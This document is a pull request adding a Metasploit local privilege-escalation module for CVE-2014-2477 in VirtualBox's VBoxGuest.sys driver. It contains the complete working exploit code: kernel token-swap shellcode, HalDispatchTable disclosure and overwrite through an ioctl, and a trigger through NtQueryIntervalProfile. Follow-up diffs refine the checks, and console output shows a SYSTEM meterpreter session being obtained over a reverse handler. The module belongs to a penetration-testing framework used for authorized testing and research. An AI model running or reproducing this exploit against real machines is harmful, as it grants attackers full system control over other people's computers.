### PR TITLE
Add CVE-2014-2477 local privilege escalation

### DIFF
--- a/modules/exploits/windows/local/vbox_guest.rb
+++ b/modules/exploits/windows/local/vbox_guest.rb
@@ -1,0 +1,277 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = AverageRanking
+
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Process
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'          => 'VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation',
+      'Description'    => %q{
+        A vulnerability within VBoxGuest module allows an attacker to inject memory they control
+        into an arbitrary location they define. This can be used by an attacker to overwrite
+        HalDispatchTable+0x4 and execute arbitrary code by subsequently calling
+        NtQueryIntervalProfile. This has been tested on VBoxGuest Additions up to 4.3.10r93012.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        =>
+        [
+          'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC
+          'Jay Smith <jsmith[at]korelogic.com>' # MSF module
+        ],
+      'Arch'          => ARCH_X86,
+      'Platform'      => 'win',
+      'SessionTypes'  => [ 'meterpreter' ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Targets'       =>
+        [
+          [ 'Automatic', { } ],
+          [ 'Windows XP SP3', { } ],
+        ],
+      'References'    =>
+        [
+          [ 'CVE', '2014-2477' ],
+          [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-001.txt' ]
+        ],
+      'DisclosureDate'=> 'Jul 15 2014',
+      'DefaultTarget' => 0
+    }))
+
+  end
+
+  def add_railgun_functions
+    session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
+    session.railgun.add_function(
+      'psapi',
+      'EnumDeviceDrivers',
+      'BOOL',
+      [
+        ["PBLOB", "lpImageBase", "out"],
+        ["DWORD", "cb", "in"],
+        ["PDWORD", "lpcbNeeded", "out"]
+      ])
+    session.railgun.add_function(
+      'psapi',
+      'GetDeviceDriverBaseNameA',
+      'DWORD',
+      [
+        ["LPVOID", "ImageBase", "in"],
+        ["PBLOB", "lpBaseName", "out"],
+        ["DWORD", "nSize", "in"]
+      ])
+  end
+
+  def open_device(dev)
+
+    invalid_handle_value = 0xFFFFFFFF
+
+    r = session.railgun.kernel32.CreateFileA(dev, "FILE_SHARE_WRITE|FILE_SHARE_READ", 0, nil, "OPEN_EXISTING", 0, nil)
+
+    handle = r['return']
+
+    if handle == invalid_handle_value
+      return nil
+    end
+
+    return handle
+  end
+
+  def find_sys_base(drvname)
+    results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
+    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")
+
+    addresses.each do |address|
+      results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
+      current_drvname = results['lpBaseName'][0..results['return'] - 1]
+      if drvname == nil
+        if current_drvname.downcase.include?('krnl')
+          return [address, current_drvname]
+        end
+      elsif drvname == results['lpBaseName'][0..results['return'] - 1]
+        return [address, current_drvname]
+      end
+    end
+
+    return nil
+  end
+
+  def ring0_shellcode(t)
+
+    tokenswap = "\x60\x64\xA1\x24\x01\x00\x00"
+    tokenswap << "\x8B\x40\x44\x50\xBB\x04"
+    tokenswap << "\x00\x00\x00\x8B\x80\x88"
+    tokenswap << "\x00\x00\x00\x2D\x88"
+    tokenswap << "\x00\x00\x00\x39\x98\x84"
+    tokenswap << "\x00\x00\x00\x75\xED\x8B\xB8\xC8"
+    tokenswap << "\x00\x00\x00\x83\xE7\xF8\x58\xBB"
+    tokenswap << "\x41\x41\x41\x41"
+    tokenswap << "\x8B\x80\x88\x00\x00\x00"
+    tokenswap << "\x2D\x88\x00\x00\x00"
+    tokenswap << "\x39\x98\x84\x00\x00\x00"
+    tokenswap << "\x75\xED\x89\xB8\xC8"
+    tokenswap << "\x00\x00\x00\x61\xC3"
+
+    tokenswap.sub!(/\x41\x41\x41\x41/, [session.sys.process.getpid].pack('<L'))
+
+    return tokenswap
+  end
+
+  def fill_memory(proc, address, length, content)
+
+    result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
+
+    if not proc.memory.writable?(address)
+      vprint_error("Failed to allocate memory")
+      return nil
+    else
+      vprint_good("#{address} is now writable")
+    end
+
+    result = proc.memory.write(address, content)
+
+    if result.nil?
+      vprint_error("Failed to write contents to memory")
+      return nil
+    else
+      vprint_good("Contents successfully written to 0x#{address.to_s(16)}")
+    end
+
+    return address
+  end
+
+  def disclose_addresses(t)
+    addresses = {}
+
+    vprint_status("Getting the Kernel module name...")
+    kernel_info = find_sys_base(nil)
+    if kernel_info.nil?
+      vprint_error("Failed to disclose the Kernel module name")
+      return nil
+    end
+    vprint_good("Kernel module found: #{kernel_info[1]}")
+
+    vprint_status("Getting a Kernel handle...")
+    kernel32_handle = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
+    kernel32_handle = kernel32_handle['return']
+    if kernel32_handle == 0
+      vprint_error("Failed to get a Kernel handle")
+      return nil
+    end
+    vprint_good("Kernel handle acquired")
+
+    vprint_status("Disclosing the HalDispatchTable...")
+    hal_dispatch_table = session.railgun.kernel32.GetProcAddress(kernel32_handle, "HalDispatchTable")
+    hal_dispatch_table = hal_dispatch_table['return']
+    if hal_dispatch_table == 0
+      vprint_error("Failed to disclose the HalDispatchTable")
+      return nil
+    end
+    hal_dispatch_table -= kernel32_handle
+    hal_dispatch_table += kernel_info[0]
+    addresses["halDispatchTable"] = hal_dispatch_table
+    vprint_good("HalDispatchTable found at 0x#{addresses["halDispatchTable"].to_s(16)}")
+
+    return addresses
+  end
+
+
+  def exploit
+
+    vprint_status("Adding the railgun stuff...")
+    add_railgun_functions
+
+    if sysinfo["Architecture"] =~ /wow64/i
+      fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
+    elsif sysinfo["Architecture"] =~ /x64/
+      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
+    end
+
+    my_target = nil
+    if target.name =~ /Automatic/
+      print_status("Detecting the target system...")
+      os = sysinfo["OS"]
+      print_status("#{os.inspect}")
+      if os =~ /windows xp/i
+        my_target = targets[1]
+        print_status("Running against #{my_target.name}")
+      end
+    else
+      my_target = target
+    end
+
+    if my_target.nil?
+      fail_with(Failure::NoTarget, "Remote system not detected as target, select the target manually")
+    end
+
+    print_status("Checking device...")
+    handle = open_device("\\\\.\\vboxguest")
+    if handle.nil?
+      fail_with(Failure::NoTarget, "\\\\.\\vboxguest device not found")
+    else
+      print_good("\\\\.\\vboxguest found!")
+    end
+
+    print_status("Disclosing the HalDispatchTable address...")
+    @addresses = disclose_addresses(my_target)
+    if @addresses.nil?
+      session.railgun.kernel32.CloseHandle(handle)
+      fail_with(Failure::Unknown, "Filed to disclose necessary address for exploitation. Aborting.")
+    else
+      print_good("Address successfully disclosed.")
+    end
+
+    print_status("Storing the shellcode in memory...")
+    this_proc = session.sys.process.open
+    kernel_shell = ring0_shellcode(my_target)
+    kernel_shell_address = 0x1
+
+    buf = "\x90" * 0x6000
+    buf[0, 56] = "\x50\x00\x00\x00"*14
+    buf[0x5000, kernel_shell.length] = kernel_shell
+
+    result = fill_memory(this_proc, kernel_shell_address, buf.length, buf)
+    if result.nil?
+      session.railgun.kernel32.CloseHandle(handle)
+      fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory")
+    else
+      print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}")
+    end
+
+    print_status("Triggering the vulnerability, corrupting the HalDispatchTable...")
+    ioctl = session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x22a040, 0x1, 140, @addresses["halDispatchTable"] + 0x4 - 40, 0)
+    session.railgun.kernel32.CloseHandle(handle)
+
+    print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...")
+    result = session.railgun.ntdll.NtQueryIntervalProfile(2, 4)
+
+    print_status("Checking privileges after exploitation...")
+
+    if not is_system?
+      fail_with(Failure::Unknown, "The exploitation wasn't successful")
+    else
+      print_good("Exploitation successful!")
+    end
+
+    p = payload.encoded
+    print_status("Injecting #{p.length.to_s} bytes to memory and executing it...")
+    if execute_shellcode(p)
+      print_good("Enjoy")
+    else
+      fail_with(Failure::Unknown, "Error while executing the payload")
+    end
+
+  end
+
+end
+

--- a/modules/exploits/windows/local/vbox_guest.rb
+++ b/modules/exploits/windows/local/vbox_guest.rb
@@ -188,7 +188,6 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def check
-    vprint_status("Adding the railgun stuff...")
     add_railgun_functions
 
     if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
@@ -207,6 +206,9 @@ class Metasploit3 < Msf::Exploit::Local
     end
 
     file_path = expand_path("%windir%") << "\\system32\\drivers\\vboxguest.sys"
+    if !file?(file_path)
+      fail_with(Failure::Unknown, "VBoxGuest.sys file does not exist in the default location") 
+    end
     major, minor, build, revision, branch = file_version(file_path)
     vprint_status("vboxguest.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
 

--- a/modules/exploits/windows/local/vbox_guest.rb
+++ b/modules/exploits/windows/local/vbox_guest.rb
@@ -89,16 +89,16 @@ class Metasploit3 < Msf::Exploit::Local
 
   def find_sys_base(drvname)
     results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
-    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")
+    addresses = results['lpImageBase'][0, results['lpcbNeeded']].unpack("V*")
 
     addresses.each do |address|
       results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
-      current_drvname = results['lpBaseName'][0..results['return'] - 1]
+      current_drvname = results['lpBaseName'][0, results['return']]
       if drvname == nil
         if current_drvname.downcase.include?('krnl')
           return [address, current_drvname]
         end
-      elsif drvname == results['lpBaseName'][0..results['return'] - 1]
+      elsif drvname == results['lpBaseName'][0, results['return']]
         return [address, current_drvname]
       end
     end
@@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Local
     tokenswap << "\x75\xED\x89\xB8\xC8"
     tokenswap << "\x00\x00\x00\x61\xC3"
 
-    tokenswap.sub!(/\x41\x41\x41\x41/, [session.sys.process.getpid].pack('<L'))
+    tokenswap.sub!(/\x41\x41\x41\x41/, [session.sys.process.getpid].pack('V'))
 
     return tokenswap
   end

--- a/modules/exploits/windows/local/vbox_guest.rb
+++ b/modules/exploits/windows/local/vbox_guest.rb
@@ -9,6 +9,8 @@ require 'rex'
 class Metasploit3 < Msf::Exploit::Local
   Rank = AverageRanking
 
+  include Msf::Post::File
+  include Msf::Post::Windows::FileInfo
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Process
 
@@ -185,11 +187,51 @@ class Metasploit3 < Msf::Exploit::Local
     return addresses
   end
 
-
-  def exploit
-
+  def check
     vprint_status("Adding the railgun stuff...")
     add_railgun_functions
+
+    if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
+      return Exploit::CheckCode::Safe
+    end
+
+    handle = open_device("\\\\.\\vboxguest")
+    if handle.nil?
+      return Exploit::CheckCode::Safe
+    end
+    session.railgun.kernel32.CloseHandle(handle)
+
+    os = sysinfo["OS"]
+    unless (os =~ /windows xp.*service pack 3/i)
+      return Exploit::CheckCode::Safe
+    end
+
+    file_path = expand_path("%windir%") << "\\system32\\drivers\\vboxguest.sys"
+    major, minor, build, revision, branch = file_version(file_path)
+    vprint_status("vboxguest.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
+
+    unless (major == 4)
+      return Exploit::CheckCode::Safe
+    end
+
+    case minor
+    when 0
+      return Exploit::CheckCode::Vulnerable if build < 26
+    when 1
+      return Exploit::CheckCode::Vulnerable if build < 34
+    when 2
+      return Exploit::CheckCode::Vulnerable if build < 26
+    when 3
+      return Exploit::CheckCode::Vulnerable if build < 12
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    if is_system?
+      fail_with(Exploit::Failure::None, 'Session is already elevated')
+    end
 
     if sysinfo["Architecture"] =~ /wow64/i
       fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
@@ -197,31 +239,16 @@ class Metasploit3 < Msf::Exploit::Local
       fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
     end
 
-    my_target = nil
-    if target.name =~ /Automatic/
-      print_status("Detecting the target system...")
-      os = sysinfo["OS"]
-      print_status("#{os.inspect}")
-      if os =~ /windows xp/i
-        my_target = targets[1]
-        print_status("Running against #{my_target.name}")
-      end
-    else
-      my_target = target
+    unless check == Exploit::CheckCode::Vulnerable
+      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
     end
 
-    if my_target.nil?
-      fail_with(Failure::NoTarget, "Remote system not detected as target, select the target manually")
-    end
-
-    print_status("Checking device...")
     handle = open_device("\\\\.\\vboxguest")
     if handle.nil?
-      fail_with(Failure::NoTarget, "\\\\.\\vboxguest device not found")
-    else
-      print_good("\\\\.\\vboxguest found!")
+      fail_with(Failure::NoTarget, "Unable to open \\\\.\\vboxguest device")
     end
 
+    my_target = targets[1]
     print_status("Disclosing the HalDispatchTable address...")
     @addresses = disclose_addresses(my_target)
     if @addresses.nil?

--- a/modules/exploits/windows/local/vbox_guest.rb
+++ b/modules/exploits/windows/local/vbox_guest.rb
@@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Local
         if current_drvname.downcase.include?('krnl')
           return [address, current_drvname]
         end
-      elsif drvname == results['lpBaseName'][0, results['return']]
+      elsif drvname == current_drvname
         return [address, current_drvname]
       end
     end


### PR DESCRIPTION
This module is for a local privilege escalation for the vulnerability
CVE-2014-2477.

Showing the exploit in action with sessions being created:

<pre>msf exploit(handler) > use exploit/windows/local/vbox_guest                                                                                                   
msf exploit(vbox_guest) >
[*] Sending stage (769536 bytes) to 192.168.5.10
[*] Meterpreter session 1 opened (192.168.5.10:4445 -> 192.168.5.10:47992) at 2014-07-15 09:39:00 -0400

msf exploit(vbox_guest) > set SESSION 1
SESSION => 1
msf exploit(vbox_guest) > rexploit -j
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.5.10:4444
msf exploit(vbox_guest) > [*] Detecting the target system...
[*] "Windows XP (Build 2600, Service Pack 3)."
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\vboxguest found!
[*] Disclosing the HalDispatchTable address...
[+] Address successfully disclosed.
[*] Storing the shellcode in memory...
[+] Kernel stager successfully stored at 0x1
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Injecting 287 bytes to memory and executing it...
[*] Sending stage (769536 bytes) to 192.168.5.10
[+] Enjoy
[*] Meterpreter session 2 opened (192.168.5.10:4444 -> 192.168.5.10:54982) at 2014-07-15 09:40:15 -0400

msf exploit(vbox_guest) > sessions -l

Active sessions
===============

  Id  Type                   Information                       Connection
  --  ----                   -----------                       ----------
  1   meterpreter x86/win32  WCB614-J20\kore @ WCB614-J20      192.168.5.10:4445 -> 192.168.5.10:47992 (10.0.2.15)
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WCB614-J20  192.168.5.10:4444 -> 192.168.5.10:54982 (10.0.2.15)
</pre>
